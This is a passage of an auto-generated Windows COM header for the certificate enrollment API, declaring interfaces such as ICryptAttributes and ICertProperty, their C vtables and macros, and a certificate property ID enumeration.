#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32d-217d-11da-b2a4-000e7bbb2b09")
    ICryptAttributes : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttribute **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICryptAttribute *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IndexByObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddRange( 
            /* [in] */ __RPC__in_opt ICryptAttributes *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICryptAttributesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICryptAttributes * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICryptAttributes * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICryptAttributes * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICryptAttributes * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttribute **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICryptAttributes * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICryptAttributes * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in_opt ICryptAttribute *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICryptAttributes * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IndexByObjectId )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *AddRange )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in_opt ICryptAttributes *pValue);
        
        END_INTERFACE
    } ICryptAttributesVtbl;

    interface ICryptAttributes
    {
        CONST_VTBL struct ICryptAttributesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICryptAttributes_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICryptAttributes_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICryptAttributes_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICryptAttributes_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICryptAttributes_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICryptAttributes_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICryptAttributes_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICryptAttributes_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICryptAttributes_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICryptAttributes_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICryptAttributes_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICryptAttributes_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICryptAttributes_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICryptAttributes_get_IndexByObjectId(This,pObjectId,pIndex)	\
    ( (This)->lpVtbl -> get_IndexByObjectId(This,pObjectId,pIndex) ) 

#define ICryptAttributes_AddRange(This,pValue)	\
    ( (This)->lpVtbl -> AddRange(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICryptAttributes_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0045 */
/* [local] */ 

typedef 
enum CERTENROLL_PROPERTYID
    {	XCN_PROPERTYID_NONE	= 0,
	XCN_CERT_KEY_PROV_HANDLE_PROP_ID	= 1,
	XCN_CERT_KEY_PROV_INFO_PROP_ID	= 2,
	XCN_CERT_SHA1_HASH_PROP_ID	= 3,
	XCN_CERT_MD5_HASH_PROP_ID	= 4,
	XCN_CERT_HASH_PROP_ID	= 3,
	XCN_CERT_KEY_CONTEXT_PROP_ID	= 5,
	XCN_CERT_KEY_SPEC_PROP_ID	= 6,
	XCN_CERT_IE30_RESERVED_PROP_ID	= 7,
	XCN_CERT_PUBKEY_HASH_RESERVED_PROP_ID	= 8,
	XCN_CERT_ENHKEY_USAGE_PROP_ID	= 9,
	XCN_CERT_CTL_USAGE_PROP_ID	= 9,
	XCN_CERT_NEXT_UPDATE_LOCATION_PROP_ID	= 10,
	XCN_CERT_FRIENDLY_NAME_PROP_ID	= 11,
	XCN_CERT_PVK_FILE_PROP_ID	= 12,
	XCN_CERT_DESCRIPTION_PROP_ID	= 13,
	XCN_CERT_ACCESS_STATE_PROP_ID	= 14,
	XCN_CERT_SIGNATURE_HASH_PROP_ID	= 15,
	XCN_CERT_SMART_CARD_DATA_PROP_ID	= 16,
	XCN_CERT_EFS_PROP_ID	= 17,
	XCN_CERT_FORTEZZA_DATA_PROP_ID	= 18,
	XCN_CERT_ARCHIVED_PROP_ID	= 19,
	XCN_CERT_KEY_IDENTIFIER_PROP_ID	= 20,
	XCN_CERT_AUTO_ENROLL_PROP_ID	= 21,
	XCN_CERT_PUBKEY_ALG_PARA_PROP_ID	= 22,
	XCN_CERT_CROSS_CERT_DIST_POINTS_PROP_ID	= 23,
	XCN_CERT_ISSUER_PUBLIC_KEY_MD5_HASH_PROP_ID	= 24,
	XCN_CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID	= 25,
	XCN_CERT_ENROLLMENT_PROP_ID	= 26,
	XCN_CERT_DATE_STAMP_PROP_ID	= 27,
	XCN_CERT_ISSUER_SERIAL_NUMBER_MD5_HASH_PROP_ID	= 28,
	XCN_CERT_SUBJECT_NAME_MD5_HASH_PROP_ID	= 29,
	XCN_CERT_EXTENDED_ERROR_INFO_PROP_ID	= 30,
	XCN_CERT_RENEWAL_PROP_ID	= 64,
	XCN_CERT_ARCHIVED_KEY_HASH_PROP_ID	= 65,
	XCN_CERT_AUTO_ENROLL_RETRY_PROP_ID	= 66,
	XCN_CERT_AIA_URL_RETRIEVED_PROP_ID	= 67,
	XCN_CERT_AUTHORITY_INFO_ACCESS_PROP_ID	= 68,
	XCN_CERT_BACKED_UP_PROP_ID	= 69,
	XCN_CERT_OCSP_RESPONSE_PROP_ID	= 70,
	XCN_CERT_REQUEST_ORIGINATOR_PROP_ID	= 71,
	XCN_CERT_SOURCE_LOCATION_PROP_ID	= 72,
	XCN_CERT_SOURCE_URL_PROP_ID	= 73,
	XCN_CERT_NEW_KEY_PROP_ID	= 74,
	XCN_CERT_FIRST_RESERVED_PROP_ID	= 92,
	XCN_CERT_LAST_RESERVED_PROP_ID	= 0x7fff,
	XCN_CERT_FIRST_USER_PROP_ID	= 0x8000,
	XCN_CERT_LAST_USER_PROP_ID	= 0xffff,
	XCN_CERT_STORE_LOCALIZED_NAME_PROP_ID	= 0x1000,
	XCN_CERT_CEP_PROP_ID	= 87
    } 	CERTENROLL_PROPERTYID;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0045_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0045_v0_0_s_ifspec;

#ifndef __ICertProperty_INTERFACE_DEFINED__
#define __ICertProperty_INTERFACE_DEFINED__

/* interface ICertProperty */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertProperty;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32e-217d-11da-b2a4-000e7bbb2b09")
    ICertProperty : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PropertyId( 
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_PropertyId( 
            /* [in] */ CERTENROLL_PROPERTYID Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE RemoveFromCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE SetValueOnCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertProperty * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertProperty * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertProperty * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertProperty * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertProperty * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertProperty * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertProperty * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertProperty * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertProperty * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertProperty * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertProperty * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertProperty * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertProperty * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertProperty * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        END_INTERFACE
    } ICertPropertyVtbl;

    interface ICertProperty
    {
        CONST_VTBL struct ICertPropertyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertProperty_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertProperty_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertProperty_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertProperty_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertProperty_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertProperty_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertProperty_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertProperty_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertProperty_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertProperty_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertProperty_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertProperty_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertProperty_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertProperty_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertProperty_INTERFACE_DEFINED__ */


#ifndef __ICertProperties_INTERFACE_DEFINED__
#define __ICertProperties_INTERFACE_DEFINED__

/* interface ICertProperties */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertProperties;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32f-217d-11da-b2a4-000e7bbb2b09")
    ICertProperties : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertProperty **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICertProperty *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertProperties * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertProperties * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertProperties * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertProperties * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertProperties * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertProperties * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertProperties * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICertProperties * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertProperty **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICertProperties * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICertProperties * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICertProperties * This,
            /* [in] */ __RPC__in_opt ICertProperty *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICertProperties * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICertProperties * This);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertProperties * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        END_INTERFACE
    } ICertPropertiesVtbl;

    interface ICertProperties
    {
        CONST_VTBL struct ICertPropertiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertProperties_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertProperties_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertProperties_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertProperties_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertProperties_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertProperties_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertProperties_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertProperties_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICertProperties_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICertProperties_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICertProperties_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICertProperties_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICertProperties_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICertProperties_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertProperties_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyFriendlyName_INTERFACE_DEFINED__
#define __ICertPropertyFriendlyName_INTERFACE_DEFINED__

/* interface ICertPropertyFriendlyName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyFriendlyName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab330-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyFriendlyName : public ICertProperty
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strFriendlyName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertPropertyFriendlyNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyFriendlyName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyFriendlyName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyFriendlyName * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ __RPC__in BSTR strFriendlyName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyFriendlyNameVtbl;

    interface ICertPropertyFriendlyName
    {
        CONST_VTBL struct ICertPropertyFriendlyNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


